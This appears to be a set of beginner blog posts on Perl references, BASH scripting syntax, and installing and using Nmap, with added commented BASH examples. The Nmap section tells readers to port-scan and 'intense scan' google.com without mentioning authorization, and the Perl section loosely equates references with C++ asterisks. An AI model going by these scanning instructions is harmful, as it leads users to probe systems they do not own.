<br />
Let's talk a bit more about variables in Perl. Every Perl variable has three components: the name, the address, and the value.<br />
<br />
Take this line of code for instance:<br />
<i>my $pet = "Noah";</i><br />
The name is "pet", the address in memory is hidden right now, and the value is "Noah".<br />
<br />
The address (also called a reference) can be taken with a backslash and placed into another scalar variable:<br />
<i>my $pet_ref = \$pet;</i><br />
<i><br />
</i><br />
Note the \$...<br />
Like in C++, this is the REFERENCE (shown in C++ by the asterisk *); it references the <b>address in memory</b>.<br />
<br />
The following line of code prints the variable that we placed the reference of $pet into:<br />
<i>print $pet_ref;</i><br />
<i>...</i>which would be the memory location!<br />
<br />
<div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>Open for answer!</b>: <input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Close'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Open'; }" style="font-size: 11px; margin: 0px; padding: 0px; width: 55px;" type="button" value="Open" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;">Ignore this for now, it'll be used for asking questions and checking code I ask you to write!</div></div></div></div></div><br />
</div>BASH scripting in Linux: an introduction [Linux] (Marshall, 2011-08-16)<div dir="ltr" style="text-align: left;" trbidi="on">I've already used a bit of <a href="http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29">BASH scripting</a> in my Wifi sniffing tutorial, but the importance of scripting in BASH and other languages such as Perl, Ruby, and Python is so great I need to write separate posts for them all.<br />
Bash stands for "Bourne-Again Shell" (you will see "sh" standing for "shell" in many places). Aptly named as the successor of the Bourne Shell, it came into use in 1989 and has since been a main scripting language for Linux; it has many features such as piping (seen before on my blog), variables and control structures (like all good languages), file reading, and Unix "wildcard" matching via the asterisk (*).<br />
<br />
Enough about stuff I'm sure you guys don't care about, let's jump right in!<br />
<a name='more'></a>First, I'll start off with some basic BASH variables and interesting things you should know before attempting to write your own program, then I'll go over basic programming syntax in a BASH environment and show some examples.<br />
<br />
In Unix as well as MS-DOS and Windows, there are variables (I'm sure we all know what variables are) called "environment" variables; they are inherited by running processes and affect those processes in many ways. Here's a short list of important ones:<br />
<br />
<b>PATH</b> - lists the directories the shell searches for the commands the user types without providing the full path.<br />
<b>HOME</b> - indicates where the user's "home" directory is located in the file hierarchy.<br />
<b>USER</b> - indicates the current user. Try running the command "echo $USER" and viewing the output; it should be your login.<br />
<b>TERM</b> - specifies the type of terminal being used by the user.<br />
<b>PS1</b> - specifies how the prompt is displayed in the shell or terminal while the system waits for a command. Mine on Backtrack5 is ">" but for some it is "$"; this can be changed to anything (for instance, your current directory, so you always know where you are).<br />
<b>PS2</b> - specifies how the prompt is displayed in the shell or terminal while the system waits for more input; it is like the PS1, but instead of when there is no command running, this is for when a command or process is waiting for more input.<br />
<b>MAIL</b> - used to indicate where a user's mail is to be found.<br />
<b>TEMP</b> - location where processes can store temporary files while running a script or process.<br />
More will be added, but this is a good list of some important ones you can use for now. Try Googling with the Google search above if you want to find out more about environment variables in Linux/Unix.<br />
<br />
Now before starting your scripting career in BASH, there are some important things you need to remember. The first is that one should ALWAYS ALWAYS ALWAYS start their script file with <b>#!/bin/bash </b>(which you will hear programmers refer to as "hash bang" or "shebang").<br />
This tells the Unix environment what type of shell you're using (bash in this case), and the location of the shell.<br />
Have this set as your first line and keep a couple blank lines in between this and the actual code so you realize where this is. It should ALWAYS be first. I think you get the importance of this.<br />
For future note when I write my Perl tutorial, the first line in a Perl (.pl) script must be "#!/usr/bin/perl"<br />
<br />
When you make your script file, whether it be through Nano or another text editor such as Vi/Vim, I like to name it in the format "filename.sh", where the ".sh" tells us it's a shell script file. You can name it almost anything, but it's quite a bit easier keeping it ".sh" so later, if you're using the ls command or whatnot, you can find all your shell scripts!<br />
<br />
After we've created the file and added the #!/bin/bash line, we need to make it executable by the system. To do this, we type the command "chmod +x filename.sh".<br />
This adds the executable permission to the file (the plus sign adds, and the x stands for executable). After we've done this, we can run the file with a few different commands.<br />
You can type "./filename.sh", "sh filename.sh" or "bash filename.sh" to run it. The first requires you to be in the same directory, however (the "./" means "in the current directory").<br />
Other options you can add are "r" and "w", which stand for read and write respectively. You can add and remove these privileges by typing +rwx or -rwx depending on which you want. You can also use numbers to specify which privileges you want.<br />
Instead of my reiterating this topic, <a href="http://catcode.com/teachmod/numeric.html">here's an excellent and short website that explains it</a>.<br />
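As an added example (not code from the original post), here is the create, chmod +x, run sequence just described as a script that checks the permission bits after each step. It builds its own throwaway "filename.sh" inside a temporary directory, so the file and directory names are constructed rather than assumed to exist:

```bash
#!/bin/bash
# Added example (not from the original post): the create, chmod +x, run
# sequence described above, checking the permission bits at each step.
# All paths are constructed inside a temporary directory.

# Write a minimal script whose very first line is the hash-bang.
write_script() {
    # $1 = path of the file to create
    printf '%s\n' '#!/bin/bash' '' 'echo "script ran"' > "$1"
}

# True (status 0) if the current user may execute the file, false otherwise.
is_executable() {
    [ -x "$1" ]
}

# Permission string as ls shows it, e.g. -rwxr-xr-x (first ten columns only,
# so an ACL or SELinux marker in column eleven does not get in the way).
mode_string() {
    ls -l "$1" | cut -c1-10
}

# "bash filename.sh": the interpreter reads the file, so this works even
# before chmod +x.  "./filename.sh" is the form that needs the x bit.
run_via_bash() {
    bash "$1"
}

demo() {
    dir=$(mktemp -d)
    script="$dir/filename.sh"
    write_script "$script"
    echo "as created:      $(mode_string "$script")"
    if is_executable "$script"; then echo "executable"; else echo "not executable yet"; fi
    chmod +x "$script"                 # symbolic form from the post
    echo "after chmod +x:  $(mode_string "$script")"
    chmod 755 "$script"                # numeric form: rwx owner, r-x group and others
    echo "after chmod 755: $(mode_string "$script")"
    run_via_bash "$script"
    rm -r "$dir"
}

demo
```

One point worth knowing: "./filename.sh" needs the execute bit because the kernel has to run the file, whereas "bash filename.sh" only needs read permission because the interpreter reads the file itself. Also, "sh filename.sh" runs whatever /bin/sh is on the system, which on many distributions is not bash, so BASH-only syntax can fail that way.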
<br />
<div style="text-align: center;"><b><u><span class="Apple-style-span" style="font-size: large;">If->Then conditional statements:</span></u></b></div><b><u><br />
</u></b><br />
I'm sure most of you have programmed before, whether in C++, Java, or some other language, and are somewhat aware of how to use if-then statements; for those who aren't, I'll explain what they are quickly, and for everyone I'll show their syntax (which means their formation) in BASH.<br />
<br />
If then statements are pretty easy to understand since they're named aptly for their use. They are used as a conditional statement (meaning, it tests a condition) and depending on the return (whether or not it is true or false) it executes (or runs) a certain line or lines of code that you choose.<br />
<br />
The syntax of if then statements in BASH is as follows:<br />
<i><br />
</i><br />
<i>if [ condition ]; then # the spaces inside the brackets are required</i><br />
<i> expression if true</i><br />
<i>else</i><br />
<i> expression otherwise if false</i><br />
<i>fi # ends if statement</i><br />
<i><br />
</i><br />
The ending "fi" is necessary for BASH to tell the computer where your if statement starts and ends. "fi" is of course "if" backwards.<br />
You can have an if then statement with only one set of expressions (it doesn't require an "else" part), or as many "elses" as you want, but you HAVE TO end with the "fi" line.<br />
Depending on how many elses you wish to add, there are other, easier ways to do this, which I will cover later as well.<br />
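As an added example (not code from the original post), here is an if statement used for the kind of input checking a script needs before it trusts an argument. It uses elif (else-if) for the middle branches, which is the shorter way of stacking several "else" parts that the text says it will cover later; the file names it tests are constructed in a temporary directory:

```bash
#!/bin/bash
# Added example (not from the original post): an if/elif/else chain used for
# input checking.  elif (else-if) is the compact way of stacking several
# "else" parts.  The file names are constructed in a temporary directory.

# Check a value handed to a script.  Each branch prints one word and returns
# a distinct status, so both the text and the exit code can be tested.
check_input() {
    value=$1
    if [ -z "$value" ]; then            # empty string: nothing was supplied
        echo "missing"
        return 1
    elif [ ! -e "$value" ]; then        # no file or directory by that name
        echo "absent"
        return 2
    elif [ -d "$value" ]; then          # exists, but it is a directory
        echo "directory"
        return 3
    elif [ ! -r "$value" ]; then        # a file we are not allowed to read
        echo "unreadable"
        return 4
    else                                # a readable file: accepted
        echo "ok"
        return 0
    fi                                  # fi closes the whole chain
}

# Numbers are compared with -lt/-gt/-eq inside [ ]; "=" compares strings.
port_class() {
    if [ "$1" -lt 1024 ]; then
        echo "privileged"               # needs root to bind on Unix
    else
        echo "unprivileged"
    fi
}

demo() {
    dir=$(mktemp -d)
    touch "$dir/data.txt"
    echo "empty argument: $(check_input "")"
    echo "missing file:   $(check_input "$dir/nope.txt")"
    echo "a directory:    $(check_input "$dir")"
    echo "readable file:  $(check_input "$dir/data.txt")"
    echo "port 22 is $(port_class 22), port 8080 is $(port_class 8080)"
    rm -r "$dir"
}

demo
```

Because each branch returns a different status, a caller can write "if check_input "$1"; then ... fi" and let the exit code drive the decision, which is how most BASH scripts chain checks together.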
<div style="text-align: center;"><span class="Apple-style-span" style="font-size: large; font-weight: bold; text-decoration: underline;">For Loops:</span></div><div style="text-align: left;"><br />
</div><div style="text-align: left;">Now again, if you've had any experience with programming, for loops shouldn't be anything new to you; however, for loops in BASH have a slightly different syntax. This time, I'm going to go over the syntax of a for loop in BASH, then explain the uses for our new readers and why these are one of the most important aspects of programming.</div>In BASH, there are a few ways to write for loops, which is interesting because in most programming languages there's one basic syntax. Here are a few ways to do them.<br />
<br />
My favorite way to do for loops is this:<br />
<br />
<i>for var in {1..10}</i><br />
<i>do</i><br />
<i> echo "the variable var is $var"</i><br />
<i>done # closes for loop</i><br />
<i><br />
</i><br />
If you're used to Java or C++ or another high level programming language and their for loops, you can use this syntax:<br />
<br />
<i>for (( i=0; i<10; i++ )) # note that spaces are a MUST (BASH is weird like this)</i><br />
<i>do</i><br />
<i> echo "increment variable i is $i"</i><br />
<i>done # closes for loop</i><br />
<i><br />
</i><br />
You can add a "break" command inside the loop, which I would recommend throwing into an "if then" statement for error or input checking.<br />
As well as the break command, there is a "continue" command, which skips straight to the next iteration. For example, if i is equal to 5 but whatever you wanted has already been completed, an if statement can check for that and a "continue" statement will then move on to the 6th iteration.<br />
This gets into bigger and better scripts in BASH and can be used quite effectively depending on your scripting needs.<br />
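As an added example (not code from the original post), here are both for-loop syntaxes from this section with "continue" and "break" placed inside if statements, as the text recommends. The port:state list it walks over is a constructed string, not output from any scanner:

```bash
#!/bin/bash
# Added example (not from the original post): both for-loop syntaxes from this
# section, with "continue" and "break" inside if statements.
# SAMPLE_RESULTS is a constructed port:state list, not scanner output.

SAMPLE_RESULTS="21:open 22:open 23:closed 25:filtered 80:open 443:open 3389:closed"

# List-style loop with continue: print the open ports and skip everything else.
open_ports() {
    for entry in $SAMPLE_RESULTS; do
        port=${entry%%:*}               # text before the colon
        state=${entry#*:}               # text after the colon
        if [ "$state" != "open" ]; then
            continue                    # jump straight to the next entry
        fi
        echo "$port"
    done
}

# C-style loop with break: try something up to $1 times and stop at the
# first success.  The "operation" is a stand-in that succeeds on attempt $2.
retry() {
    max=$1
    succeed_on=$2
    result="gave up after $max attempts"
    for (( attempt=1; attempt<=max; attempt++ )); do
        if [ "$attempt" -eq "$succeed_on" ]; then
            result="succeeded on attempt $attempt"
            break                       # leave the loop early
        fi
    done
    echo "$result"
}

demo() {
    echo "open ports: $(open_ports | tr '\n' ' ')"
    retry 5 3
    retry 2 3
}

demo
```

The retry pattern is the usual home for break: a bounded loop that gives up after a fixed number of attempts instead of spinning forever, with the outcome decided inside an if statement.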
<div style="text-align: center;"><span class="Apple-style-span" style="font-size: large;"><b><u>While Do Loops and Do Until Loops:</u></b></span></div><div style="text-align: center;"><b><u><br />
</u></b></div><div style="text-align: left;">Another basic and important piece of programming syntax to understand is the while loop, which in BASH comes in two forms: while-do and until-do. I'll explain both and their uses.<br />
<br />
The basic while loop syntax is as follows:<br />
<br />
<i>while [ expression ]; do</i><br />
<i><< Block >></i><br />
<i>done</i><br />
<br />
Note that the square brackets must have spaces between them and the tested expression, or BASH won't parse and run it.<br />
<br />
A do until loop does the block statement UNTIL the expression evaluates to true, which is the opposite of the while do loop.<br />
Here is an example:<br />
<br />
<i>until [ expression ]; do</i><br />
<i><< Block >></i><br />
<i>done</i><br />
<i><br />
</i><br />
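As an added example (not code from the original post), here is a while loop that reads its input one line at a time, which is the most common real use of while in BASH, and an until loop that keeps reading until a 0 arrives, the case this section describes. The log lines are constructed to resemble sshd messages; the addresses and names in them are placeholders:

```bash
#!/bin/bash
# Added example (not from the original post): a while loop that reads input a
# line at a time, and an until loop that runs until the value 0 arrives.
# SAMPLE_LOG is constructed to resemble sshd log lines; the addresses and
# names are placeholders, not a real log.

SAMPLE_LOG='Jul 21 23:01:02 host sshd[111]: Failed password for root from 203.0.113.5 port 4000 ssh2
Jul 21 23:01:05 host sshd[112]: Accepted password for marshall from 192.0.2.10 port 4001 ssh2
Jul 21 23:01:09 host sshd[113]: Failed password for admin from 203.0.113.5 port 4002 ssh2
Jul 21 23:01:12 host sshd[114]: Failed password for root from 203.0.113.7 port 4003 ssh2'

# while loop: "read" returns false at end of input, which ends the loop.
# Prints "address count" for every source with failed logins, most first.
# The loop sits on the right of a pipe, so it runs in a subshell: variables
# set inside it are not visible afterwards, which is why it prints instead.
count_failed_by_source() {
    printf '%s\n' "$SAMPLE_LOG" | while IFS= read -r line; do
        case $line in
            *"Failed password"*)
                src=${line##*from }        # everything after the last "from "
                echo "${src%% *}"          # and up to the next space
                ;;
        esac
    done | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# until loop: consume numbers from standard input until a 0 shows up, counting
# the non-zero ones.  Note the spaces inside [ ]; the test fails without them.
# Reading from stdin lets a file or pipe stand in for an interactive prompt.
read_until_zero() {
    i=-1
    count=0
    until [ "$i" -eq 0 ]; do
        read -r i || break                 # end of input: stop instead of spinning
        if [ "$i" -ne 0 ]; then
            count=$((count + 1))
        fi
    done
    echo "$count"
}

demo() {
    echo "failed logins by source:"
    count_failed_by_source
    echo "numbers read before a 0: $(printf '3\n5\n0\n7\n' | read_until_zero)"
}

demo
```

The "|| break" after read is the detail that matters for the until form: when the input runs out without a 0 ever arriving, the loop ends instead of looping forever on the last value.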
So if you have the expression "i = 0" and the variable is prompted for every time the loop goes through: with a while loop, the loop would only continue if the user input "0" every time, but with an "until," the loop would continue UNTIL i equals 0, meaning that ANY number other than 0 would keep the loop going.</div></div>
<br />
Marshall, 2011-07-21 (updated 2022-12-20)<br />
<b><u><span class="Apple-style-span" style="font-size: x-large;">Installing and using Nmap [Linux/Windows]</span></u></b><div dir="ltr" style="text-align: left;" trbidi="on">I'm afraid I've been very busy lately with a new job working overnights and figuring out all my college needs for moving in next month, but I've been doing a lot of research and reading on a few interesting topics so hopefully the next few posts will be very interesting.<br />
<div>I've also updated a few of my posts including my <a href="http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html">wifi sniffing</a> and <a href="http://www.hackavision.com/2011/07/securing-your-personal-home-network.html">securing your home network</a> posts, so check those out!</div><div><br />
</div><div>Today's post is about one of the most important netsec tools you will have in your arsenal. This program is called Nmap and is a free, open-source network auditing and security tool that we will use quite often while looking for vulnerabilities on networks.</div><div><br />
</div><div>I will be explaining how to install and do some basic usage on Linux AND Windows (yay Windows!). I will be using my Backtrack 5 for Linux and Windows XP and hopefully get a Vista/Win7 part up as well.<br />
<a name='more'></a><b><u><span class="Apple-style-span" style="font-size: x-large;"><br />
Installing Nmap on Linux:</span></u></b></div><div><b><u><span class="Apple-style-span" style="font-size: x-large;"><br />
</span></u></b></div><div><div style="text-align: left;"><span class="Apple-style-span">If you're using Backtrack 5, it should be automatically installed and updated, but if for some reason it's not you can follow this walk-through for non-BT users.</span></div><span class="Apple-style-span"><br />
Installing it with the terminal or command prompt is as easy as running one command: "sudo apt-get install nmap". Remember, the "sudo" (super user do) prefix is only necessary if you're not root or a super user already.<br />
<br />
If this doesn't work for you for some reason, you can do the following (exactly how we installed SSLStrip and Ettercap)...</span><span class="Apple-style-span"><br />
</span><br />
<ol style="text-align: left;"><li><span class="Apple-style-span">Download <a href="http://nmap.org/dist/nmap-5.51.tgz">this file</a> to your Linux desktop or home.</span></li>
<li><span class="Apple-style-span">Navigate to that location in your terminal using the "cd" command.</span></li>
<li><span class="Apple-style-span">Issue the command "tar xvf [file name]" where the file name is the one you downloaded: "nmap-5.51.tgz" from the link above, or "nmap-5.51.tar.bz2" if you fetched the bzip2 release.</span></li>
<li><span class="Apple-style-span">Then type the command "cd </span><span class="Apple-style-span">nmap-5.51"</span></li>
<li><span class="Apple-style-span">Next, type "./configure"</span></li>
<li><span class="Apple-style-span">Then "make"</span></li>
<li><span class="Apple-style-span">Then finally "make install"</span></li>
<ol style="text-align: left;"><li><span class="Apple-style-span">If this command doesn't work, make sure you're the super user (you can type su [username] to do this or type "sudo" before the command).</span></li>
</ol></ol></div><div><span style="font-size: small;">This should correctly install version 5.51 of nmap. You can now use this amazing tool. Scroll down to view a basic tutorial and overview on some of its usages.</span><span style="font-size: small;"><br />
</span><br />
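As an added example (not code from the original post or from the Nmap project), here is a small wrapper around the tar / configure / make steps above that refuses to unpack a source tarball whose SHA-256 digest does not match the value you obtained separately (for a real release, the digest or signature the project publishes; the digest used here is computed from a stand-in tarball the script builds itself). The build commands are only printed, not run, so the block works offline:

```bash
#!/bin/bash
# Added example (not from the post or the Nmap project): verify a downloaded
# source tarball before extracting and building it.  The tarball and its
# digest are constructed inside the block; EXPECTED in real use is the value
# published for the release, which you must supply yourself.

# Print the SHA-256 hex digest of a file, using whichever tool the system has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Compare the digest, then extract into $3.  Returns 1 and extracts nothing
# if the digest does not match, so a tampered or wrong download never gets built.
verify_and_extract() {
    tarball=$1
    expected=$2
    dest=$3
    actual=$(sha256_of "$tarball")
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $tarball: expected $expected, got $actual" >&2
        return 1
    fi
    mkdir -p "$dest"
    tar xf "$tarball" -C "$dest"       # the post's "tar xvf", quietly, into $dest
}

# The build commands the post lists, printed rather than executed here.
build_steps() {
    printf '%s\n' "cd $1" "./configure" "make" "sudo make install"
}

# Offline demo: build a tiny stand-in tarball, compute its digest, and show
# both the accepted and the rejected path.
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/src/nmap-demo"
    echo 'placeholder source' > "$work/src/nmap-demo/README"
    tar czf "$work/nmap-demo.tgz" -C "$work/src" nmap-demo
    good=$(sha256_of "$work/nmap-demo.tgz")
    bad="0000000000000000000000000000000000000000000000000000000000000000"   # placeholder
    verify_and_extract "$work/nmap-demo.tgz" "$good" "$work/out" && echo "digest OK, extracted"
    verify_and_extract "$work/nmap-demo.tgz" "$bad" "$work/bad" || echo "refused: digest did not match"
    build_steps "$work/out/nmap-demo"
    rm -r "$work"
}

demo
```

Checking the digest against a value fetched over a separate channel is what turns "download and build" into something you can trust; a digest copied from the same page as the tarball only proves the download was not corrupted in transit.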
<b><u><span class="Apple-style-span" style="font-size: x-large;">Installing Nmap on Windows XP, Vista, 7, NT, and 2k:</span></u></b><br />
<span style="font-size: small;"><br />
Every Windows version should have the same installation process, but mine will be done on XP since I don't have Vista or 7 available at the moment, so if there are any complications with Vista, 7, or another version, tell me and I'll try to help you with it.<br />
<br />
Let's start. First, download <a href="http://nmap.org/dist/nmap-5.51-setup.exe">this file</a> and save it to your computer; it should only take a few seconds to complete.<br />
Next, double click the file so it opens (as an exe does) and click through the first page by hitting "I agree."<br />
The next window should have all the options selected but if they aren't, select them all and hit next.<br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZ_xsKPAJXRWMWuZYuqUO2c36nImL-3r1ykE_hFMmX4BWVXx5pe5Uv0PoWbFYfwjW-MM0MGlYkqVovUlK25d3wwYt2v3T1uq_nR510V_EDfmz9fBsFdtwrKSTdYEJrAjyn4ZZj2N0JnI/s1600/1+-+first+page.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZ_xsKPAJXRWMWuZYuqUO2c36nImL-3r1ykE_hFMmX4BWVXx5pe5Uv0PoWbFYfwjW-MM0MGlYkqVovUlK25d3wwYt2v3T1uq_nR510V_EDfmz9fBsFdtwrKSTdYEJrAjyn4ZZj2N0JnI/s400/1+-+first+page.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Make sure all of them are selected.</td></tr>
</tbody></table><br />
<span style="font-size: small;">After you hit next, it should prompt where to install. The default location is C:\Program Files\Nmap\ which is fine. Hit the install key and let it do its thing.</span><br />
<span style="font-size: small;">If you have a different version already installed, it will prompt you with the following message:</span><span style="font-size: small;"> </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgup7Dv3iHK1-jTLvy822EkkHl6Waj56q1EZwOBixkWZVwKDdnolaYYOIm2trTLwxdvGCK5k5a5aSaNGnbkM_eMDofiy0PqcEgJXQlCJd-9F8NqoOhkE8j0tXDrgzvQzf1n8lyq_8gD_LQ/s1600/2+-+new+version.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgup7Dv3iHK1-jTLvy822EkkHl6Waj56q1EZwOBixkWZVwKDdnolaYYOIm2trTLwxdvGCK5k5a5aSaNGnbkM_eMDofiy0PqcEgJXQlCJd-9F8NqoOhkE8j0tXDrgzvQzf1n8lyq_8gD_LQ/s400/2+-+new+version.JPG" width="400" /></a><span style="font-size: small;"><br />
</span></div></div><div><span style="font-size: small;"><br />
Hit the "yes" prompt and continue on. It will ask you to un-install the older version first and you should do so by hitting "uninstall." It will then ask you to install it again (just hit next and install it again).<br />
After it's all done, it will come up with the following window:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1HkeIjMI1xlfvUMhpnQlq7rF1m507Ao14j9Tygz6iOlBd7HhhXIZmqSovHW2wxLAgY-SQWvNlDC5G0uuZyPz0RgDX8oJ-E_UBSzOxE9UEO9g2A6me0QaZXX-Y1Ib4VFbfL1qbu1SDP4g/s1600/3+-+open+nmap.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1HkeIjMI1xlfvUMhpnQlq7rF1m507Ao14j9Tygz6iOlBd7HhhXIZmqSovHW2wxLAgY-SQWvNlDC5G0uuZyPz0RgDX8oJ-E_UBSzOxE9UEO9g2A6me0QaZXX-Y1Ib4VFbfL1qbu1SDP4g/s400/3+-+open+nmap.JPG" width="400" /></a> </div><br />
<span style="font-size: small;">I would suggest keeping the "start WinPcap service at startup" checked, but if you like a clean startup when loading your computer, turn it off.<br />
</span><br />
<span style="font-size: small;">It should be all ready to load. Hit the finish key and go to your desktop to open it (double click the shortcut, of course); it will be called "Nmap - Zenmap GUI".</span><br />
<span style="font-size: small;">Zenmap is the GUI (graphical user interface) version of Nmap. When we're on Linux we will be using both, but I prefer the command prompt (terminal use) version over the GUI.<br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGd1CSPRYGw3J0jh1WdQN3yXRyQeXsHd76WK80m16eqk_OeSnGmotc5N8CG_TPllEWVLKzOQM3ikGcPqCPYiEdSHJFhN2DXjaWBLlLxt_Qq2NyDjxlPH0pGieu1_x7QUQwyIc5ccpQKWE/s1600/4+-+zenmap+icon.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGd1CSPRYGw3J0jh1WdQN3yXRyQeXsHd76WK80m16eqk_OeSnGmotc5N8CG_TPllEWVLKzOQM3ikGcPqCPYiEdSHJFhN2DXjaWBLlLxt_Qq2NyDjxlPH0pGieu1_x7QUQwyIc5ccpQKWE/s400/4+-+zenmap+icon.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A screenshot of the shortcut on my desktop - Windows XP SP3</td></tr>
</tbody></table><span style="font-size: small;">Scroll down and let's start some basic usage of Zenmap on our Windows system!<br />
<br />
</span></div><u><b><span style="font-size: x-large;">Using Nmap on Linux:</span></b></u><span style="font-size: x-large;"><span style="font-size: small;"><br />
First, let's start off with some basic usage in the terminal, using nmap to scan some nodes and websites.</span></span><span style="font-size: x-large;"><span style="font-size: small;"><br />
Open up a new terminal and issue the command "nmap google.com" and review the results.<br />
</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXidXXGUFJwNkK7d4-Pj3WPpH6H3xsH_Vjju-H46rwetR6uOAcMDb97pYtJYaqFnnhrr4B6sMK5UFLnkNU4yh0Bmjpm9ibQgs0EYfVESVTOEKWMhSHNSIo6Km6gNrmZxmoFEKH0sHdR-Q/s1600/1+-+nmap+google+basic.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXidXXGUFJwNkK7d4-Pj3WPpH6H3xsH_Vjju-H46rwetR6uOAcMDb97pYtJYaqFnnhrr4B6sMK5UFLnkNU4yh0Bmjpm9ibQgs0EYfVESVTOEKWMhSHNSIo6Km6gNrmZxmoFEKH0sHdR-Q/s400/1+-+nmap+google+basic.jpeg" width="400" /></a></div>
Now, try running that command with the "verbose" option on (verbose means "wordy" or in layman's terms more output).<br />
<br />
Run the command "nmap -v google.com" and watch the difference in output.<br />
<span style="font-size: x-large;"><b><u>Using Nmap on Windows:</u></b></span><span style="font-size: x-large;"> </span><br />
<blockquote class=""><span style="font-size: small;">Now it's time to open up Nmap and start some basic scanning.</span> Double click on your icon to open up the program and it will look like this on Windows XP:</blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkcVT925EdNkqFAGMRrPEKAwXwNeks0EjIkYk2ESN-xYoyl8L_aH29_dnTajT5EafX-MCtPlC3OUatRIArwLnFDgh3KDPqE03Q3nApNw8nxfZ1jLn0TANm-_UtZO9cO_9rahZx9QBvG9w/s1600/5+-+opening+nmap.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkcVT925EdNkqFAGMRrPEKAwXwNeks0EjIkYk2ESN-xYoyl8L_aH29_dnTajT5EafX-MCtPlC3OUatRIArwLnFDgh3KDPqE03Q3nApNw8nxfZ1jLn0TANm-_UtZO9cO_9rahZx9QBvG9w/s400/5+-+opening+nmap.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Nmap opening screen.</td></tr>
</tbody></table> The "target" is obviously the target of the scan we want; the "profile" is the type of scan, and changing it changes the "command" line accordingly. I'll describe what each option does and what the profiles are used for, and if you use the Linux version, the options on the command line are the same.<br />
<br />
You can see the "hosts" and "services" tabs which we will be using when scanning multiple targets and when saving and reopening old scans.<br />
Also you can see the "nmap output" tab, which is a nice view of what nmap is doing or has done, similar to what you would see in the terminal on Linux.<br />
The ports/hosts tab shows the open/filtered ports after completing a test, and we will be using this tab later.<br />
The "topology" is an interesting tab that shows you traceroute and the location of each nmap scan.<br />
The host details is important since it tells us what the host is running and other useful information we will be using.<br />
The "scans" tab lists the scans we've run this session. It's useful if you scan multiple targets in one sitting and want to look back at the results.<br />
<br />
After that quick explanation, let's run a basic scan and view the results.<br />
<br />
Type into the "target" "www.google.com" and leave "intense scan" on then click the "scan" button to start.<br />
When we start, it should start outputting text such as "initiating scan" then "scanning www.google.com" and google's IP address and a bunch more stuff. Here's what mine looks like at the bottom of the page since there's quite a bit of output.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibfdvOxnYXoQSqiY7qYkb_LxPRFSfyxr3sVXm_qJEdJ7bwG1Pf9avQojdZgGXYLHojI6DlapxE_tbFF0-38M9qXFdXz7rGNklYsErU2P9jlmqhyMJdQQlZEYhMXp_wDMPLbgJ7mkuP08o/s1600/6+-+nmap+scan+intense+with+verbose.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibfdvOxnYXoQSqiY7qYkb_LxPRFSfyxr3sVXm_qJEdJ7bwG1Pf9avQojdZgGXYLHojI6DlapxE_tbFF0-38M9qXFdXz7rGNklYsErU2P9jlmqhyMJdQQlZEYhMXp_wDMPLbgJ7mkuP08o/s400/6+-+nmap+scan+intense+with+verbose.JPG" width="392" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Verbose Google.com Nmap scan</td></tr>
</tbody></table>Whoa. That's a lot of gibberish to most of you I assume, so here's the quick rundown.<br />
